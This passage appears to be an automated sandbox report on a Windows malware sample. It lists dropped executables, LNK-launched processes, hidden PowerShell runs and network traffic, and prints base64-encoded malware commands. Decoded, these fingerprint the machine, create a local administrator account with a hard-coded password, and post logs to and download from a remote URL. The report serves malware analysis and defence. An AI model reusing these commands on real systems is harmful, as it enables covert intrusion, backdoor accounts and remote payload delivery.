HMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline"Jump to behavior
        Source: svczHost.exe.10.drStatic PE information: section name: .managed
        Source: svczHost.exe.10.drStatic PE information: section name: hydrated
        Source: myRdpService.exe.17.drStatic PE information: section name: .managed
        Source: myRdpService.exe.17.drStatic PE information: section name: hydrated
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC4ACE846E pushad ; ret 2_2_00007FFC4ACE849D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC4ACE7C6E pushad ; retf 2_2_00007FFC4ACE7C9D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC4ACE00AD push A8BA495Dh; iretd 2_2_00007FFC4ACE011B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC4ACE849E push eax; ret 2_2_00007FFC4ACE84AD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC4ACE7C9E push eax; retf 2_2_00007FFC4ACE7CAD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC4ACE0DC2 push es; ret 2_2_00007FFC4ACE0DC3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC4ADB1B14 push esi; iretd 2_2_00007FFC4ADB1B17
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFC4ABCD2A5 pushad ; iretd 6_2_00007FFC4ABCD2A6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFC4ACE2000 push eax; iretd 6_2_00007FFC4ACE2009
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFC4ACE00AD push A8BA495Dh; iretd 6_2_00007FFC4ACE011B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFC4ABDD2A5 pushad ; iretd 10_2_00007FFC4ABDD2A6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFC4B223FA9 push esp; retf 10_2_00007FFC4B223FAA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFC4AD09D3D push FC81CB09h; retf 21_2_00007FFC4AD09DA2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFC4AD02AFD push E837A849h; ret 21_2_00007FFC4AD02B69
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 43_2_00007FFC4ACE00AD push A8BA495Dh; iretd 43_2_00007FFC4ACE011B

        Persistence and Installation Behavior

        barindex
        Windows shortcut file (LNK) starts blacklisted processes
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.dllJump to dropped file
        Source: C:\Windows\Temp\svczHost.exeFile created: C:\Windows\Temp\myRdpService.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
        Source: C:\Windows\Temp\svczHost.exeFile created: C:\Windows\Temp\myRdpService.exeJump to dropped file
        Source: C:\Windows\Temp\myRdpService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 8008
        Source: unknownNetwork traffic detected: HTTP traffic on port 8008 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49791
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
